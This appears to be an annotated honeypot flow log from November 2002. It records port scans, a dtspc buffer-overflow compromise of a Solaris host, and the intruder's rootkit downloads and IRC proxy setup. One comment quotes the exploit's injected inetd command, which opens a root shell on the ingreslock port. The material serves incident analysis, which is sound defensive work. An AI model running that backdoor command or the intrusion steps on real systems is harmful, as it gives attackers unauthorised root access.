# XXX add UDP: syslogs # XXX add pings # scans 29 Nov 02 14:12:30 29 Nov 02 14:12:31 6 24.167.44.129.3018 -> 192.168.100.28.1433 3 3 186 162 RST 29 Nov 02 14:21:36 29 Nov 02 14:21:36 6 203.69.233.93.2341 -> 192.168.100.28.443 1 1 74 54 RST 29 Nov 02 14:25:08 29 Nov 02 14:25:10 6 61.144.145.243.3667 -> 192.168.100.28.8080 3 3 198 162 RST 29 Nov 02 14:25:08 29 Nov 02 14:25:10 6 61.144.145.243.3668 -> 192.168.100.28.80 3 3 198 162 RST 29 Nov 02 14:25:08 29 Nov 02 14:25:10 6 61.144.145.243.3677 -> 192.168.100.28.3128 3 3 198 162 RST 29 Nov 02 14:57:31 29 Nov 02 14:57:32 6 203.239.31.60.1191 -> 192.168.100.28.1433 3 3 186 162 RST 29 Nov 02 17:10:05 29 Nov 02 17:10:06 6 67.36.28.116.3916 -> 192.168.100.28.1433 3 3 186 162 RST # checking rootshell port 29 Nov 02 17:36:25 29 Nov 02 17:36:25 6 61.219.90.180.56709 -> 192.168.100.28.1524 1 1 74 54 RST # EXPLOIT # scan of dtspc, information revealed: zoberius: SunOS:5.8:sun4u. 29 Nov 02 17:36:25 29 Nov 02 17:36:26 6 61.219.90.180.56710 -> 192.168.100.28.6112 7 5 523 412 FIN # open connection to dtspc, no data transferred, purpose unknown 29 Nov 02 17:36:25 29 Nov 02 17:46:25 6 61.219.90.180.56399 -> 192.168.100.28.6112 3 2 206 144 FIN # the buffer overflow exploit itself, #echo "ingreslock stream tcp nowait root /bin/sh sh -i">/tmp/x;/usr/sbin/inetd -s /tmp/x;sleep 10;/bin/rm -f /tmp/x 29 Nov 02 17:36:26 29 Nov 02 17:36:37 6 61.219.90.180.56711 -> 192.168.100.28.6112 7 6 4648 408 FIN # connection to the rootshell 29 Nov 02 17:36:37 29 Nov 02 18:00:00 6 61.219.90.180.56712 -> 192.168.100.28.1524 1860 1838 123391 138203 RST # FTP control connection to get some tools 29 Nov 02 17:42:42 29 Nov 02 17:45:13 6 192.168.100.28.32783 -> 62.211.66.16.21 31 35 2088 2617 RST # FTP data connection: wget 29 Nov 02 17:42:51 29 Nov 02 17:43:23 6 62.211.66.16.20 -> 192.168.100.28.32784 98 65 144009 4298 FIN # FTP data connection: dlp 29 Nov 02 17:43:23 29 Nov 02 17:43:24 6 62.211.66.16.20 -> 192.168.100.28.32785 5 4 1968 272 FIN # FTP data connection: solbnc 29 Nov 02 17:43:24 29 Nov 02 17:43:50 6 62.211.66.16.20 -> 192.168.100.28.32786 79 51 114943 3374 FIN # FTP data connection: ipv6sun 29 Nov 02 17:44:35 29 Nov 02 17:44:35 6 62.211.66.16.20 -> 192.168.100.28.32788 5 4 831 272 FIN # wget to get rootkit over HTTP GET /bobzz/sol.tar.gz 29 Nov 02 17:45:29 29 Nov 02 17:52:40 6 192.168.100.28.32789 -> 62.211.66.53.80 821 1294 44529 1954330 FIN # ftp control to sunsolve 29 Nov 02 17:53:56 29 Nov 02 17:54:17 6 192.168.100.28.32791 -> 192.18.99.122.21 17 16 1086 1982 RST # FTP data connection: 111085-02.zip 29 Nov 02 17:54:02 29 Nov 02 17:54:17 6 192.18.99.122.20 -> 192.168.100.28.32792 26 21 32328 1298 FIN # ftp control to sunsolve 2 29 Nov 02 17:54:25 29 Nov 02 17:58:32 6 192.168.100.28.32793 -> 192.18.99.122.21 17 16 1075 1975 RST # ftp data: 108949-07.zip 29 Nov 02 17:54:31 29 Nov 02 17:58:32 6 192.18.99.122.20 -> 192.168.100.28.32794 764 666 1082792 37992 FIN # close of XXX above 29 Nov 02 17:59:59 29 Nov 02 17:59:59 6 61.219.90.180.56399 ?> 192.168.100.28.6112 1 1 66 54 RST # scan of telnet 29 Nov 02 18:00:15 29 Nov 02 18:00:15 6 61.221.179.26.4342 -> 192.168.100.28.23 1 1 74 54 RST # psyBNC connect (IRC proxy) 29 Nov 02 18:04:07 29 Nov 02 18:12:40 6 80.117.14.44.3934 -> 192.168.100.28.7000 75 64 4432 19740 RST # busy IRC server 29 Nov 02 18:04:21 29 Nov 02 18:05:08 6 192.168.100.28.32795 -> 206.252.192.195.6667 8 6 501 420 FIN # identauth attempt from irc server 29 Nov 02 18:04:46 29 Nov 02 18:04:46 6 206.252.192.195.7254 -> 192.168.100.28.113 1 1 82 54 RST # busy IRC server 29 Nov 02 18:05:14 29 Nov 02 18:05:59 6 192.168.100.28.32796 -> 206.252.192.195.6667 7 6 439 420 FIN # ident auth attempt 29 Nov 02 18:05:38 29 Nov 02 18:05:38 6 206.252.192.195.7918 -> 192.168.100.28.113 1 1 82 54 RST # IRC busy 29 Nov 02 18:06:08 29 Nov 02 18:06:53 6 192.168.100.28.32797 -> 206.252.192.195.6667 8 6 517 420 FIN 29 Nov 02 18:06:32 29 Nov 02 18:06:32 6 206.252.192.195.8597 -> 192.168.100.28.113 1 1 82 54 RST 29 Nov 02 18:07:02 29 Nov 02 18:07:47 6 192.168.100.28.32798 -> 206.252.192.195.6667 7 6 433 420 FIN 29 Nov 02 18:07:26 29 Nov 02 18:07:26 6 206.252.192.195.9333 -> 192.168.100.28.113 1 1 82 54 RST 29 Nov 02 18:07:59 29 Nov 02 18:08:43 6 192.168.100.28.32799 -> 206.252.192.195.6667 8 6 495 420 FIN 29 Nov 02 18:08:22 29 Nov 02 18:08:22 6 206.252.192.195.10072 -> 192.168.100.28.113 1 1 82 54 RST 29 Nov 02 18:08:52 29 Nov 02 18:09:35 6 192.168.100.28.32800 -> 206.252.192.195.6667 7 6 433 420 FIN 29 Nov 02 18:09:14 29 Nov 02 18:09:14 6 206.252.192.195.10754 -> 192.168.100.28.113 1 1 82 54 RST 29 Nov 02 18:09:47 29 Nov 02 18:10:10 6 192.168.100.28.32801 -> 206.252.192.195.5555 7 6 433 420 FIN 29 Nov 02 18:09:49 29 Nov 02 18:09:49 6 206.252.192.195.11208 -> 192.168.100.28.113 1 1 82 54 RST 29 Nov 02 18:10:25 29 Nov 02 18:10:47 6 192.168.100.28.32802 -> 206.252.192.195.5555 9 7 572 474 FIN 29 Nov 02 18:10:26 29 Nov 02 18:10:26 6 206.252.192.195.11682 -> 192.168.100.28.113 1 1 82 54 RST 29 Nov 02 18:11:02 29 Nov 02 18:11:02 6 206.252.192.195.12160 -> 192.168.100.28.113 1 1 82 54 RST # IRC irc-1.stealth.net 29 Nov 02 18:11:02 30 Nov 02 04:17:17 6 192.168.100.28.32803 -> 206.252.192.195.5555 1871 2110 123872 243212 RST # reconnect ro psyBNC 29 Nov 02 18:12:39 29 Nov 02 19:01:17 6 80.117.14.44.3935 -> 192.168.100.28.7000 273 275 18066 33173 RST 29 Nov 02 19:43:15 29 Nov 02 19:43:18 6 67.195.152.135.1146 -> 192.168.100.28.139 3 3 186 162 RST 29 Nov 02 22:50:12 29 Nov 02 22:50:12 6 66.28.103.87.1742 -> 192.168.100.28.443 1 1 74 54 RST 29 Nov 02 22:54:21 29 Nov 02 22:54:23 6 80.117.14.44.1045 -> 192.168.100.28.7000 7 5 462 399 FIN 29 Nov 02 22:54:26 29 Nov 02 22:54:28 6 80.117.14.44.1046 -> 192.168.100.28.7000 6 6 408 453 FIN 29 Nov 02 22:54:31 29 Nov 02 22:54:35 6 80.117.14.44.1047 -> 192.168.100.28.7000 13 11 834 6113 RST 29 Nov 02 23:07:55 29 Nov 02 23:07:56 6 64.160.228.206.2407 -> 192.168.100.28.1433 3 3 186 162 RST 30 Nov 02 00:12:04 30 Nov 02 00:12:05 6 211.214.125.74.2262 -> 192.168.100.28.1433 3 3 186 162 RST 30 Nov 02 04:17:02 30 Nov 02 04:17:18 6 80.117.14.44.2398 -> 192.168.100.28.7000 44 42 3432 11688 RST 30 Nov 02 06:08:00 30 Nov 02 06:08:00 6 211.75.30.52.1159 -> 192.168.100.28.443 1 1 74 54 RST 30 Nov 02 06:22:10 30 Nov 02 06:22:12 6 64.231.37.135.3731 -> 192.168.100.28.1433 3 3 186 162 RST 30 Nov 02 08:13:26 30 Nov 02 08:13:26 6 64.24.196.50.0 -> 192.168.100.28.1080 1 1 54 54 RST 30 Nov 02 08:13:26 30 Nov 02 08:13:26 6 64.24.196.50.0 -> 192.168.100.28.3128 1 1 54 54 RST 30 Nov 02 08:13:26 30 Nov 02 08:13:26 6 64.24.196.50.0 -> 192.168.100.28.80 1 1 54 54 RST 30 Nov 02 08:13:26 30 Nov 02 08:13:26 6 64.24.196.50.0 -> 192.168.100.28.8080 1 1 54 54 RST